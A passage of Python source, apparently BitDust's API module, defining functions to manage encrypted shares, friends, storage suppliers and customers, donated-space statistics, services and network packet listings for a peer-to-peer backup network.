ERROR('item \"%s\" is not found in catalog' % knownPathID)\r\n versions = []\r\n if glob_path['version']:\r\n versions.append(glob_path['version'])\r\n if not versions:\r\n versions.extend(item.get_versions())\r\n for version in versions:\r\n backupIDs.append(packetid.MakeBackupID(glob_path['customer'], knownPathID, version))\r\n if not backupIDs:\r\n return ERROR('not found any remote versions for \"%s\"' % remote_path)\r\n r = []\r\n for backupID in backupIDs:\r\n r.append({'backup_id': backupID, 'aborted': restore_monitor.Abort(backupID), })\r\n if _Debug:\r\n lg.out(_DebugLevel, ' stopping %s' % r)\r\n return RESULT(r)\r\n\r\n\r\ndef file_explore(local_path):\r\n \"\"\"\r\n Opens given local path in the OS file manager.\r\n \"\"\"\r\n from lib import misc\r\n from system import bpio\r\n locpath = bpio.portablePath(local_path)\r\n if not bpio.pathExist(locpath):\r\n return ERROR('local path does not exist')\r\n misc.ExplorePathInOS(locpath)\r\n return OK()\r\n\r\n#------------------------------------------------------------------------------\r\n\r\ndef share_list(only_active=False, include_mine=True, include_granted=True):\r\n \"\"\"\r\n Returns a list of known shares, use `only_active`, `include_mine` and `include_granted` to filter the results.\r\n \"\"\"\r\n if not driver.is_on('service_shared_data'):\r\n return ERROR('service_shared_data() is not started')\r\n from access import shared_access_coordinator\r\n from crypt import my_keys\r\n from userid import global_id\r\n from userid import my_id\r\n results = []\r\n if only_active:\r\n for key_id in shared_access_coordinator.list_active_shares():\r\n _glob_id = global_id.ParseGlobalID(key_id)\r\n to_be_listed = False\r\n if include_mine and 
_glob_id['idurl'] == my_id.getLocalIDURL():\r\n to_be_listed = True\r\n if include_granted and _glob_id['idurl'] != my_id.getLocalIDURL():\r\n to_be_listed = True\r\n if not to_be_listed:\r\n continue\r\n cur_share = shared_access_coordinator.get_active_share(key_id)\r\n if not cur_share:\r\n lg.warn('share %s not found' % key_id)\r\n continue\r\n results.append(cur_share.to_json())\r\n return RESULT(results)\r\n for key_id in my_keys.known_keys():\r\n if not key_id.startswith('share_'):\r\n continue\r\n _glob_id = global_id.ParseGlobalID(key_id)\r\n to_be_listed = False\r\n if include_mine and _glob_id['idurl'] == my_id.getLocalIDURL():\r\n to_be_listed = True\r\n if include_granted and _glob_id['idurl'] != my_id.getLocalIDURL():\r\n to_be_listed = True\r\n if not to_be_listed:\r\n continue\r\n results.append({\r\n 'key_id': key_id,\r\n 'idurl': _glob_id['idurl'],\r\n 'state': None,\r\n 'suppliers': [],\r\n })\r\n return RESULT(results)\r\n\r\n\r\ndef share_create(owner_id=None, key_size=2048):\r\n \"\"\"\r\n Creates a new share by generating a new private key with a random \"share_\" alias.\r\n \"\"\"\r\n if not driver.is_on('service_shared_data'):\r\n return ERROR('service_shared_data() is not started')\r\n from crypt import key\r\n from crypt import my_keys\r\n from userid import my_id\r\n if not owner_id:\r\n owner_id = my_id.getGlobalID()\r\n key_id = None\r\n while True:\r\n random_sample = os.urandom(24)\r\n key_alias = 'share_%s' % key.HashMD5(random_sample, hexdigest=True)\r\n key_id = my_keys.make_key_id(alias=key_alias, creator_glob_id=owner_id)\r\n if my_keys.is_key_registered(key_id):\r\n continue\r\n break\r\n key_object = my_keys.generate_key(key_id, key_size=key_size)\r\n if key_object is None:\r\n return ERROR('failed to generate private key \"%s\"' % key_id)\r\n return OK(my_keys.make_key_info(\r\n key_object,\r\n key_id=key_id,\r\n include_private=False,\r\n ), message='new share \"%s\" was generated successfully' % key_id, )\r\n\r\n\r\ndef share_grant(trusted_remote_user, key_id):\r\n \"\"\"\r\n Grants access to the given share to a trusted remote user.\r\n \"\"\"\r\n if not driver.is_on('service_shared_data'):\r\n return ERROR('service_shared_data() is not started')\r\n if not key_id.startswith('share_'):\r\n return ERROR('invalid share name')\r\n from userid import global_id\r\n remote_idurl = trusted_remote_user\r\n if trusted_remote_user.count('@'):\r\n glob_id = global_id.ParseGlobalID(trusted_remote_user)\r\n remote_idurl = glob_id['idurl']\r\n if not remote_idurl:\r\n return ERROR('wrong user id')\r\n from access import shared_access_donor\r\n ret = Deferred()\r\n\r\n def _on_shared_access_donor_success(result):\r\n ret.callback(OK() if result else ERROR('failed'))\r\n return None\r\n\r\n def _on_shared_access_donor_failed(err):\r\n ret.callback(ERROR('failed'))\r\n return None\r\n\r\n d = Deferred()\r\n d.addCallback(_on_shared_access_donor_success)\r\n d.addErrback(_on_shared_access_donor_failed)\r\n shared_access_donor_machine = shared_access_donor.SharedAccessDonor(log_events=True, publish_events=True, )\r\n shared_access_donor_machine.automat('init', (remote_idurl, key_id, d, ))\r\n return ret\r\n\r\n\r\ndef share_open(key_id):\r\n \"\"\"\r\n Opens the given share and connects it to the remote suppliers.\r\n \"\"\"\r\n if not driver.is_on('service_shared_data'):\r\n return ERROR('service_shared_data() is not started')\r\n if not key_id.startswith('share_'):\r\n return ERROR('invalid share name')\r\n from access import shared_access_coordinator\r\n active_share = shared_access_coordinator.get_active_share(key_id)\r\n new_share = False\r\n if not active_share:\r\n new_share = True\r\n active_share = shared_access_coordinator.SharedAccessCoordinator(key_id, log_events=True, 
publish_events=True, )\r\n ret = Deferred()\r\n\r\n def _on_shared_access_coordinator_state_changed(oldstate, newstate, event_string, args):\r\n active_share.removeStateChangedCallback(_on_shared_access_coordinator_state_changed)\r\n if newstate == 'CONNECTED':\r\n if new_share:\r\n ret.callback(OK('share \"%s\" opened' % key_id, extra_fields=active_share.to_json()))\r\n else:\r\n ret.callback(OK('share \"%s\" refreshed' % key_id, extra_fields=active_share.to_json()))\r\n else:\r\n ret.callback(ERROR('share \"%s\" was not opened' % key_id, extra_fields=active_share.to_json()))\r\n return None\r\n\r\n active_share.addStateChangedCallback(_on_shared_access_coordinator_state_changed, oldstate=None, newstate='CONNECTED')\r\n active_share.addStateChangedCallback(_on_shared_access_coordinator_state_changed, oldstate=None, newstate='DISCONNECTED')\r\n active_share.automat('restart')\r\n return ret\r\n\r\n\r\ndef share_close(key_id):\r\n \"\"\"\r\n Closes the given share if it was opened before.\r\n \"\"\"\r\n if not driver.is_on('service_shared_data'):\r\n return ERROR('service_shared_data() is not started')\r\n if not key_id.startswith('share_'):\r\n return ERROR('invalid share name')\r\n from access import shared_access_coordinator\r\n this_share = shared_access_coordinator.get_active_share(key_id)\r\n if not this_share:\r\n return ERROR('this share is not opened')\r\n this_share.automat('shutdown')\r\n return OK('share \"%s\" closed' % key_id, extra_fields=this_share.to_json())\r\n\r\n\r\ndef share_history():\r\n \"\"\"\r\n Not implemented yet, always returns an empty list.\r\n \"\"\"\r\n if not driver.is_on('service_shared_data'):\r\n return ERROR('service_shared_data() is not started')\r\n return RESULT([],)\r\n\r\n#------------------------------------------------------------------------------\r\n\r\ndef friend_list():\r\n \"\"\"\r\n Returns the list of correspondent IDs\r\n \"\"\"\r\n from contacts import contactsdb\r\n from userid import global_id\r\n result = []\r\n for idurl, alias in contactsdb.correspondents():\r\n glob_id = global_id.ParseIDURL(idurl)\r\n contact_status_label = None\r\n contact_state = None\r\n if driver.is_on('service_identity_propagate'):\r\n from p2p import contact_status\r\n state_machine_inst = contact_status.getInstance(idurl)\r\n if state_machine_inst:\r\n contact_status_label = contact_status.stateToLabel(state_machine_inst.state)\r\n contact_state = state_machine_inst.state\r\n result.append({\r\n 'idurl': idurl,\r\n 'global_id': glob_id['customer'],\r\n 'idhost': glob_id['idhost'],\r\n 'username': glob_id['user'],\r\n 'alias': alias,\r\n 'contact_status': contact_status_label,\r\n 'contact_state': contact_state,\r\n })\r\n return RESULT(result)\r\n\r\ndef friend_add(idurl_or_global_id, alias=''):\r\n \"\"\"\r\n Adds a user to the list of friends\r\n \"\"\"\r\n from contacts import contactsdb\r\n from userid import global_id\r\n idurl = idurl_or_global_id\r\n if global_id.IsValidGlobalUser(idurl_or_global_id):\r\n idurl = global_id.GlobalUserToIDURL(idurl_or_global_id)\r\n if not idurl:\r\n return ERROR('you must specify the global IDURL address where your identity file was last located')\r\n if not contactsdb.is_correspondent(idurl):\r\n contactsdb.add_correspondent(idurl, alias)\r\n contactsdb.save_correspondents()\r\n return OK('new friend has been added')\r\n return OK('this friend has already been added')\r\n\r\ndef friend_remove(idurl_or_global_id):\r\n \"\"\"\r\n Removes a user from the list of friends\r\n \"\"\"\r\n from contacts import contactsdb\r\n from userid import global_id\r\n idurl = idurl_or_global_id\r\n if 
global_id.IsValidGlobalUser(idurl_or_global_id):\r\n idurl = global_id.GlobalUserToIDURL(idurl_or_global_id)\r\n if not idurl:\r\n return ERROR('you must specify the global IDURL address where your identity file was last located')\r\n if contactsdb.is_correspondent(idurl):\r\n contactsdb.remove_correspondent(idurl)\r\n contactsdb.save_correspondents()\r\n return OK('friend has been removed')\r\n return ERROR('friend not found')\r\n\r\n#------------------------------------------------------------------------------\r\n\r\ndef suppliers_list(customer_idurl_or_global_id=None, verbose=False):\r\n \"\"\"\r\n This method returns a list of suppliers - nodes which store your encrypted data on their own machines.\r\n\r\n Return:\r\n\r\n {'status': 'OK',\r\n 'result':[{\r\n 'connected': '05-06-2016 13:06:05',\r\n 'idurl': 'http://p2p-id.ru/bitdust_j_vps1014.xml',\r\n 'files_count': 14,\r\n 'position': 0,\r\n 'contact_status': 'offline',\r\n 'contact_state': 'OFFLINE'\r\n }, {\r\n 'connected': '05-06-2016 13:04:57',\r\n 'idurl': 'http://veselin-p2p.ru/bitdust_j_vps1001.xml',\r\n 'files_count': 14,\r\n 'position': 1,\r\n 'contact_status': 'online',\r\n 'contact_state': 'CONNECTED'\r\n }]}\r\n \"\"\"\r\n if not driver.is_on('service_customer'):\r\n return ERROR('service_customer() is not started')\r\n from contacts import contactsdb\r\n from customer import supplier_connector\r\n from p2p import contact_status\r\n from lib import misc\r\n from userid import my_id\r\n from userid import global_id\r\n from storage import backup_matrix\r\n customer_idurl = customer_idurl_or_global_id\r\n if not customer_idurl:\r\n customer_idurl = my_id.getLocalID()\r\n else:\r\n if global_id.IsValidGlobalUser(customer_idurl):\r\n customer_idurl = global_id.GlobalUserToIDURL(customer_idurl)\r\n results = []\r\n for (pos, supplier_idurl, ) in enumerate(contactsdb.suppliers(customer_idurl)):\r\n r = {\r\n 'position': pos,\r\n 'idurl': supplier_idurl,\r\n 'global_id': global_id.UrlToGlobalID(supplier_idurl),\r\n 'supplier_state':\r\n None if not supplier_connector.is_supplier(supplier_idurl, customer_idurl)\r\n else supplier_connector.by_idurl(supplier_idurl, customer_idurl).state,\r\n 'connected': misc.readSupplierData(supplier_idurl, 'connected', customer_idurl),\r\n 'contact_status': None,\r\n 'contact_state': None,\r\n }\r\n if contact_status.isKnown(supplier_idurl):\r\n cur_state = contact_status.getInstance(supplier_idurl).state\r\n r['contact_status'] = contact_status.stateToLabel(cur_state)\r\n r['contact_state'] = cur_state\r\n if verbose:\r\n _files, _total, _report = backup_matrix.GetSupplierStats(pos, customer_idurl=customer_idurl)\r\n r['listfiles'] = misc.readSupplierData(supplier_idurl, 'listfiles', customer_idurl)\r\n r['fragments'] = {\r\n 'items': _files,\r\n 'files': _total,\r\n 'details': _report,\r\n }\r\n results.append(r)\r\n return RESULT(results)\r\n\r\n\r\ndef supplier_replace(index_or_idurl_or_global_id):\r\n \"\"\"\r\n Executes a fire/hire process for the given supplier; another random node will\r\n replace this supplier. 
As soon as a new supplier is found and connected,\r\n rebuilding of all uploaded data will be started and the new node will start\r\n getting reconstructed fragments.\r\n\r\n Return:\r\n\r\n {'status': 'OK', 'result': 'supplier http://p2p-id.ru/alice.xml will be replaced by new peer'}\r\n \"\"\"\r\n if not driver.is_on('service_customer'):\r\n return ERROR('service_customer() is not started')\r\n from contacts import contactsdb\r\n from userid import my_id\r\n from userid import global_id\r\n customer_idurl = my_id.getLocalID()\r\n supplier_idurl = index_or_idurl_or_global_id\r\n if supplier_idurl.isdigit():\r\n supplier_idurl = contactsdb.supplier(int(supplier_idurl), customer_idurl=customer_idurl)\r\n else:\r\n if global_id.IsValidGlobalUser(supplier_idurl):\r\n supplier_idurl = global_id.GlobalUserToIDURL(supplier_idurl)\r\n if supplier_idurl and contactsdb.is_supplier(supplier_idurl, customer_idurl=customer_idurl):\r\n from customer import fire_hire\r\n fire_hire.AddSupplierToFire(supplier_idurl)\r\n fire_hire.A('restart')\r\n return OK('supplier \"%s\" will be replaced by new random peer' % supplier_idurl)\r\n return ERROR('supplier not found')\r\n\r\n\r\ndef supplier_change(index_or_idurl_or_global_id, new_supplier_idurl_or_global_id):\r\n \"\"\"\r\n Does the same as supplier_replace(), but the new node must be provided by you - you can manually assign a supplier.\r\n\r\n Return:\r\n\r\n {'status': 'OK', 'result': 'supplier http://p2p-id.ru/alice.xml will be replaced by http://p2p-id.ru/bob.xml'}\r\n \"\"\"\r\n if not driver.is_on('service_customer'):\r\n return ERROR('service_customer() is not started')\r\n from contacts import contactsdb\r\n from userid import my_id\r\n from userid import global_id\r\n customer_idurl = my_id.getLocalID()\r\n supplier_idurl = index_or_idurl_or_global_id\r\n if supplier_idurl.isdigit():\r\n supplier_idurl = contactsdb.supplier(int(supplier_idurl), customer_idurl=customer_idurl)\r\n else:\r\n if global_id.IsValidGlobalUser(supplier_idurl):\r\n supplier_idurl = global_id.GlobalUserToIDURL(supplier_idurl)\r\n new_supplier_idurl = new_supplier_idurl_or_global_id\r\n if global_id.IsValidGlobalUser(new_supplier_idurl):\r\n new_supplier_idurl = global_id.GlobalUserToIDURL(new_supplier_idurl)\r\n if not supplier_idurl or not contactsdb.is_supplier(supplier_idurl, customer_idurl=customer_idurl):\r\n return ERROR('supplier not found')\r\n if contactsdb.is_supplier(new_supplier_idurl, customer_idurl=customer_idurl):\r\n return ERROR('peer \"%s\" is your supplier already' % new_supplier_idurl)\r\n from customer import fire_hire\r\n from customer import supplier_finder\r\n supplier_finder.AddSupplierToHire(new_supplier_idurl)\r\n fire_hire.AddSupplierToFire(supplier_idurl)\r\n fire_hire.A('restart')\r\n return OK('supplier \"%s\" will be replaced by \"%s\"' % (supplier_idurl, new_supplier_idurl))\r\n\r\n\r\ndef suppliers_ping():\r\n \"\"\"\r\n Sends short requests to all suppliers to get their current statuses.\r\n\r\n Return:\r\n\r\n {'status': 'OK', 'result': 'requests to all suppliers were sent'}\r\n \"\"\"\r\n if not driver.is_on('service_customer'):\r\n return ERROR('service_customer() is not started')\r\n from p2p import propagate\r\n propagate.SlowSendSuppliers(0.1)\r\n return OK('requests to all suppliers were sent')\r\n\r\n\r\ndef suppliers_dht_lookup(customer_idurl_or_global_id):\r\n \"\"\"\r\n Scans the DHT network for key-value pairs related to the given customer and\r\n returns a list of his \"possible\" suppliers.\r\n \"\"\"\r\n 
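# the DHT scan runs asynchronously, so a Deferred is returned here and fires later with the RESULT\r\n if not 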
driver.is_on('service_supplier_relations'):\r\n return ERROR('service_supplier_relations() is not started')\r\n from dht import dht_relations\r\n from userid import my_id\r\n from userid import global_id\r\n customer_idurl = customer_idurl_or_global_id\r\n if not customer_idurl:\r\n customer_idurl = my_id.getLocalID()\r\n else:\r\n if global_id.IsValidGlobalUser(customer_idurl):\r\n customer_idurl = global_id.GlobalUserToIDURL(customer_idurl)\r\n ret = Deferred()\r\n d = dht_relations.scan_customer_supplier_relations(customer_idurl)\r\n d.addCallback(lambda result_list: ret.callback(RESULT(result_list)))\r\n d.addErrback(lambda err: ret.callback(ERROR([err, ])))\r\n return ret\r\n\r\n#------------------------------------------------------------------------------\r\n\r\n\r\ndef customers_list(verbose=False):\r\n \"\"\"\r\n List of customers - nodes who store their own data on your machine.\r\n\r\n Return:\r\n\r\n {'status': 'OK',\r\n 'result': [ { 'idurl': 'http://p2p-id.ru/bob.xml',\r\n 'position': 0,\r\n 'status': 'offline'\r\n }]}\r\n \"\"\"\r\n if not driver.is_on('service_supplier'):\r\n return ERROR('service_supplier() is not started')\r\n from contacts import contactsdb\r\n from p2p import contact_status\r\n from userid import global_id\r\n results = []\r\n for pos, customer_idurl in enumerate(contactsdb.customers()):\r\n r = {\r\n 'position': pos,\r\n 'global_id': global_id.UrlToGlobalID(customer_idurl),\r\n 'idurl': customer_idurl,\r\n 'contact_status': None,\r\n 'contact_state': None,\r\n }\r\n if contact_status.isKnown(customer_idurl):\r\n cur_state = contact_status.getInstance(customer_idurl).state\r\n r['contact_status'] = contact_status.stateToLabel(cur_state)\r\n r['contact_state'] = cur_state\r\n results.append(r)\r\n return RESULT(results)\r\n\r\ndef customer_reject(idurl_or_global_id):\r\n \"\"\"\r\n Stop supporting given customer, remove all his files from local disc, close\r\n connections with that node.\r\n\r\n Return:\r\n\r\n {'status': 'OK', 'result': 'customer http://p2p-id.ru/bob.xml rejected, 536870912 bytes were freed'}\r\n \"\"\"\r\n if not driver.is_on('service_supplier'):\r\n return ERROR('service_supplier() is not started')\r\n from contacts import contactsdb\r\n from storage import accounting\r\n from main import settings\r\n from main import events\r\n from supplier import local_tester\r\n from p2p import p2p_service\r\n from lib import packetid\r\n from userid import global_id\r\n customer_idurl = idurl_or_global_id\r\n if global_id.IsValidGlobalUser(customer_idurl):\r\n customer_idurl = global_id.GlobalUserToIDURL(customer_idurl)\r\n if not contactsdb.is_customer(customer_idurl):\r\n return ERROR('customer not found')\r\n # send packet to notify about service from us was rejected\r\n # TODO - this is not yet handled on other side\r\n p2p_service.SendFailNoRequest(customer_idurl, packetid.UniqueID(), 'service rejected')\r\n # remove from customers list\r\n current_customers = contactsdb.customers()\r\n current_customers.remove(customer_idurl)\r\n contactsdb.update_customers(current_customers)\r\n contactsdb.remove_customer_meta_info(customer_idurl)\r\n contactsdb.save_customers()\r\n # remove records for this customer from quotas info\r\n space_dict = accounting.read_customers_quotas()\r\n consumed_by_customer = space_dict.pop(customer_idurl, None)\r\n consumed_space = accounting.count_consumed_space(space_dict)\r\n space_dict['free'] = settings.getDonatedBytes() - int(consumed_space)\r\n accounting.write_customers_quotas(space_dict)\r\n 
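# fire an event so other modules know this customer is gone\r\n 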
events.send('existing-customer-terminated', dict(idurl=customer_idurl))\r\n # restart local tester\r\n local_tester.TestUpdateCustomers()\r\n return OK('customer \"%s\" rejected, \"%s\" bytes were freed' % (customer_idurl, consumed_by_customer))\r\n\r\n\r\ndef customers_ping():\r\n \"\"\"\r\n Sends Identity packet to all customers to check their current statuses.\r\n Every node will reply with an Ack packet to any valid incoming Identity packet.\r\n\r\n Return:\r\n\r\n {'status': 'OK', 'result': 'requests to all customers were sent'}\r\n \"\"\"\r\n if not driver.is_on('service_supplier'):\r\n return ERROR('service_supplier() is not started')\r\n from p2p import propagate\r\n propagate.SlowSendCustomers(0.1)\r\n return OK('requests to all customers were sent')\r\n\r\n#------------------------------------------------------------------------------\r\n\r\n\r\ndef space_donated():\r\n \"\"\"\r\n Returns detailed statistics about your donated space usage.\r\n\r\n Return:\r\n\r\n {'status': 'OK',\r\n 'result': [{\r\n 'consumed': 0,\r\n 'consumed_percent': '0%',\r\n 'consumed_str': '0 bytes',\r\n 'customers': [],\r\n 'customers_num': 0,\r\n 'donated': 1073741824,\r\n 'donated_str': '1024 MB',\r\n 'free': 1073741824,\r\n 'old_customers': [],\r\n 'real': 0,\r\n 'used': 0,\r\n 'used_percent': '0%',\r\n 'used_str': '0 bytes'\r\n }]}\r\n \"\"\"\r\n from storage import accounting\r\n result = accounting.report_donated_storage()\r\n lg.out(4, 'api.space_donated finished with %d customers and %d errors' % (\r\n len(result['customers']), len(result['errors']),))\r\n for err in result['errors']:\r\n lg.out(4, ' %s' % err)\r\n errors = result.pop('errors', [])\r\n return RESULT([result, ], errors=errors,)\r\n\r\n\r\ndef space_consumed():\r\n \"\"\"\r\n Returns some info about your current usage of BitDust resources.\r\n\r\n Return:\r\n\r\n {'status': 'OK',\r\n 'result': [{\r\n 'available': 907163720,\r\n 'available_per_supplier': 907163720,\r\n 'available_per_supplier_str': '865.14 MB',\r\n 'available_str': '865.14 MB',\r\n 'needed': 1073741824,\r\n 'needed_per_supplier': 1073741824,\r\n 'needed_per_supplier_str': '1024 MB',\r\n 'needed_str': '1024 MB',\r\n 'suppliers_num': 2,\r\n 'used': 166578104,\r\n 'used_per_supplier': 166578104,\r\n 'used_per_supplier_str': '158.86 MB',\r\n 'used_percent': '0.155%',\r\n 'used_str': '158.86 MB'\r\n }]}\r\n \"\"\"\r\n from storage import accounting\r\n result = accounting.report_consumed_storage()\r\n lg.out(4, 'api.space_consumed finished')\r\n return RESULT([result, ])\r\n\r\n\r\ndef space_local():\r\n \"\"\"\r\n Returns detailed statistics about current usage of your local disk.\r\n\r\n Return:\r\n\r\n {'status': 'OK',\r\n 'result': [{\r\n 'backups': 0,\r\n 'backups_str': '0 bytes',\r\n 'customers': 0,\r\n 'customers_str': '0 bytes',\r\n 'diskfree': 103865696256,\r\n 'diskfree_percent': '0.00162%',\r\n 'diskfree_str': '96.73 GB',\r\n 'disktotal': 63943473102848,\r\n 'disktotal_str': '59552 GB',\r\n 'temp': 48981,\r\n 'temp_str': '47.83 KB',\r\n 'total': 45238743,\r\n 'total_percent': '0%',\r\n 'total_str': '43.14 MB'\r\n }]}\r\n \"\"\"\r\n from storage import accounting\r\n result = accounting.report_local_storage()\r\n lg.out(4, 'api.space_local finished')\r\n return RESULT([result, ],)\r\n\r\n#------------------------------------------------------------------------------\r\n\r\ndef automats_list():\r\n \"\"\"\r\n Returns a list of all currently running state machines.\r\n\r\n Return:\r\n\r\n {'status': 'OK',\r\n 'result': [{\r\n 'index': 1,\r\n 'name': 'initializer',\r\n 
'state': 'READY',\r\n 'timers': ''\r\n }, {\r\n 'index': 2,\r\n 'name': 'shutdowner',\r\n 'state': 'READY',\r\n 'timers': ''\r\n }]}\r\n \"\"\"\r\n from automats import automat\r\n result = [{\r\n 'index': a.index,\r\n 'name': a.name,\r\n 'state': a.state,\r\n 'timers': (','.join(a.getTimers().keys())),\r\n } for a in automat.objects().values()]\r\n lg.out(4, 'api.automats_list responded with %d items' % len(result))\r\n return RESULT(result)\r\n\r\n#------------------------------------------------------------------------------\r\n\r\n\r\ndef services_list():\r\n \"\"\"\r\n Returns detailed info about all currently running network services.\r\n\r\n Return:\r\n\r\n {'status': 'OK',\r\n 'result': [{\r\n 'config_path': 'services/backup-db/enabled',\r\n 'depends': ['service_list_files', 'service_data_motion'],\r\n 'enabled': True,\r\n 'index': 3,\r\n 'installed': True,\r\n 'name': 'service_backup_db',\r\n 'state': 'ON'\r\n }, {\r\n 'config_path': 'services/backups/enabled',\r\n 'depends': ['service_list_files', 'service_employer', 'service_rebuilding'],\r\n 'enabled': True,\r\n 'index': 4,\r\n 'installed': True,\r\n 'name': 'service_backups',\r\n 'state': 'ON'\r\n }]}\r\n \"\"\"\r\n result = [{\r\n 'index': svc.index,\r\n 'name': name,\r\n 'state': svc.state,\r\n 'enabled': svc.enabled(),\r\n 'installed': svc.installed(),\r\n 'config_path': svc.config_path,\r\n 'depends': svc.dependent_on()\r\n } for name, svc in sorted(driver.services().items(), key=lambda i: i[0])]\r\n lg.out(4, 'api.services_list responded with %d items' % len(result))\r\n return RESULT(result)\r\n\r\n\r\ndef service_info(service_name):\r\n \"\"\"\r\n Returns detailed info for single service.\r\n\r\n Return:\r\n\r\n {'status': 'OK',\r\n 'result': [{\r\n 'config_path': 'services/tcp-connections/enabled',\r\n 'depends': ['service_network'],\r\n 'enabled': True,\r\n 'index': 24,\r\n 'installed': True,\r\n 'name': 'service_tcp_connections',\r\n 'state': 'ON'\r\n }]}\r\n \"\"\"\r\n svc = driver.services().get(service_name, None)\r\n if svc is None:\r\n service_name = 'service_' + service_name.replace('-', '_')\r\n svc = driver.services().get(service_name, None)\r\n if svc is None:\r\n return ERROR('service \"%s\" not found' % service_name)\r\n return RESULT([{\r\n 'index': svc.index,\r\n 'name': svc.service_name,\r\n 'state': svc.state,\r\n 'enabled': svc.enabled(),\r\n 'installed': svc.installed(),\r\n 'config_path': svc.config_path,\r\n 'depends': svc.dependent_on()\r\n }])\r\n\r\n\r\ndef service_start(service_name):\r\n \"\"\"\r\n Start given service immediately. 
This method also sets `True` for\r\n the corresponding option in the program settings:\r\n\r\n .bitdust/config/services/[service name]/enabled\r\n\r\n If some other services, which depend on that service,\r\n were already enabled, they will be started as well.\r\n\r\n Return:\r\n\r\n {'status': 'OK', 'result': 'service_tcp_connections was switched on'}\r\n \"\"\"\r\n from main import config\r\n svc = driver.services().get(service_name, None)\r\n if svc is None:\r\n service_name = 'service_' + service_name.replace('-', '_')\r\n svc = driver.services().get(service_name, None)\r\n if svc is None:\r\n lg.out(4, 'api.service_start %s not found' % service_name)\r\n return ERROR('service \"%s\" was not found' % service_name)\r\n if svc.state == 'ON':\r\n lg.out(4, 'api.service_start %s already started' % service_name)\r\n return ERROR('service \"%s\" already started' % service_name)\r\n current_config = config.conf().getBool(svc.config_path)\r\n if current_config:\r\n lg.out(4, 'api.service_start %s already enabled' % service_name)\r\n return ERROR('service \"%s\" already enabled' % service_name)\r\n config.conf().setBool(svc.config_path, True)\r\n return OK('\"%s\" was switched on' % service_name)\r\n\r\n\r\ndef service_stop(service_name):\r\n \"\"\"\r\n Stop given service immediately. It will also set `False` for the corresponding\r\n option in the settings.\r\n\r\n .bitdust/config/services/[service name]/enabled\r\n\r\n Dependent services will be stopped as well.\r\n\r\n Return:\r\n\r\n {'status': 'OK', 'result': 'service_tcp_connections was switched off'}\r\n \"\"\"\r\n from main import config\r\n svc = driver.services().get(service_name, None)\r\n if svc is None:\r\n service_name = 'service_' + service_name.replace('-', '_')\r\n svc = driver.services().get(service_name, None)\r\n if svc is None:\r\n lg.out(4, 'api.service_stop %s not found' % service_name)\r\n return ERROR('service \"%s\" not found' % service_name)\r\n current_config = config.conf().getBool(svc.config_path)\r\n if current_config is None:\r\n lg.out(4, 'api.service_stop config item %s was not found' % svc.config_path)\r\n return ERROR('config item \"%s\" was not found' % svc.config_path)\r\n if current_config is False:\r\n lg.out(4, 'api.service_stop %s already disabled' % service_name)\r\n return ERROR('service \"%s\" already disabled' % service_name)\r\n config.conf().setBool(svc.config_path, False)\r\n return OK('\"%s\" was switched off' % service_name)\r\n\r\n\r\ndef service_restart(service_name, wait_timeout=10):\r\n \"\"\"\r\n Stop given service and start it again, but only if it is already enabled.\r\n Do not change corresponding `.bitdust/config/services/[service name]/enabled` option.\r\n Dependent services will be \"restarted\" as well.\r\n\r\n Return:\r\n\r\n {'status': 'OK', 'result': 'service_tcp_connections was restarted'}\r\n \"\"\"\r\n svc = driver.services().get(service_name, None)\r\n if svc is None:\r\n service_name = 'service_' + service_name.replace('-', '_')\r\n svc = driver.services().get(service_name, None)\r\n if svc is None:\r\n lg.out(4, 'api.service_restart %s not found' % service_name)\r\n return ERROR('service \"%s\" not found' % service_name)\r\n ret = Deferred()\r\n d = driver.restart(service_name, wait_timeout=wait_timeout)\r\n d.addCallback(\r\n lambda resp: ret.callback(\r\n OK(resp)))\r\n d.addErrback(\r\n lambda err: ret.callback(\r\n ERROR(err.getErrorMessage())))\r\n return ret\r\n
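\r\n# Example usage (a sketch, not part of the original module): service_restart()\r\n# returns a twisted Deferred, so a caller would typically attach callbacks to it:\r\n#\r\n# d = service_restart('service_tcp_connections', wait_timeout=10)\r\n# d.addCallback(lambda resp: lg.out(4, 'restarted: %s' % resp))\r\n\r\n#------------------------------------------------------------------------------\r\n\r\n\r\ndef 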
packets_stats():\r\n \"\"\"\r\n Returns detailed info about current network usage.\r\n\r\n Return:\r\n\r\n {'status': 'OK',\r\n 'result': [{\r\n 'in': {\r\n 'failed_packets': 0,\r\n 'total_bytes': 0,\r\n 'total_packets': 0,\r\n 'unknown_bytes': 0,\r\n 'unknown_packets': 0\r\n },\r\n 'out': {\r\n 'http://p2p-id.ru/bitdust_j_vps1014.xml': 0,\r\n 'http://veselin-p2p.ru/bitdust_j_vps1001.xml': 0,\r\n 'failed_packets': 8,\r\n 'total_bytes': 0,\r\n 'total_packets': 0,\r\n 'unknown_bytes': 0,\r\n 'unknown_packets': 0\r\n }}]}\r\n \"\"\"\r\n if not driver.is_on('service_gateway'):\r\n return ERROR('service_gateway() is not started')\r\n from p2p import p2p_stats\r\n return RESULT([{\r\n 'in': p2p_stats.counters_in(),\r\n 'out': p2p_stats.counters_out(),\r\n }])\r\n\r\n\r\ndef packets_list():\r\n \"\"\"\r\n Return list of incoming and outgoing packets.\r\n \"\"\"\r\n if not driver.is_on('service_gateway'):\r\n return ERROR('service_gateway() is not started')\r\n from transport import packet_in\r\n from transport import packet_out\r\n result = []\r\n for pkt_out in packet_out.queue():\r\n result.append({\r\n 'name': pkt_out.outpacket.Command,\r\n 'label': pkt_out.label,\r\n 'from_to': 'to',\r\n 'target': pkt_out.remote_idurl,\r\n })\r\n for pkt_in in packet_in.items().values():\r\n result.append({\r\n 'name': pkt_in.transfer_id,\r\n 'label': pkt_in.label,\r\n 'from_to': 'from',\r\n 'target': pkt_in.sender_idurl,\r\n })\r\n return RESULT(result)\r\n\r\n#------------------------------------------------------------------------------\r\n\r\ndef transfers_list():\r\n \"\"\"\r\n \"\"\"\r\n if not driver.is_on('service_data_motion'):\r\n return ERROR('service_data_motion() is not started')\r\n from customer import io_throttle\r\n from userid import global_id\r\n result = []\r\n for supplier_idurl in io_throttle.throttle().ListSupplierQueues():\r\n r = {\r\n 'idurl': supplier_idurl,\r\n 'global_id': global_id.UrlToGlobalID(supplier_idurl),\r\n 'outgoing': [],\r\n 'incoming': [],\r\n }\r\n q = io_throttle.throttle().GetSupplierQueue(supplier_idurl)\r\n for packet_id in q.ListSendItems():\r\n i = q.GetSendItem(packet_id)\r\n if i:\r\n r['outgoing'].append({\r\n 'packet_id': i.packetID,\r\n 'owner_id': i.ownerID,\r\n 'remote_id': i.remoteID,\r\n 'customer': i.customerID,\r\n 'remote_path': i.remotePath,\r\n 'filename': i.fileName,\r\n 'created': i.created,\r\n 'sent': i.sendTime,\r\n })\r\n for 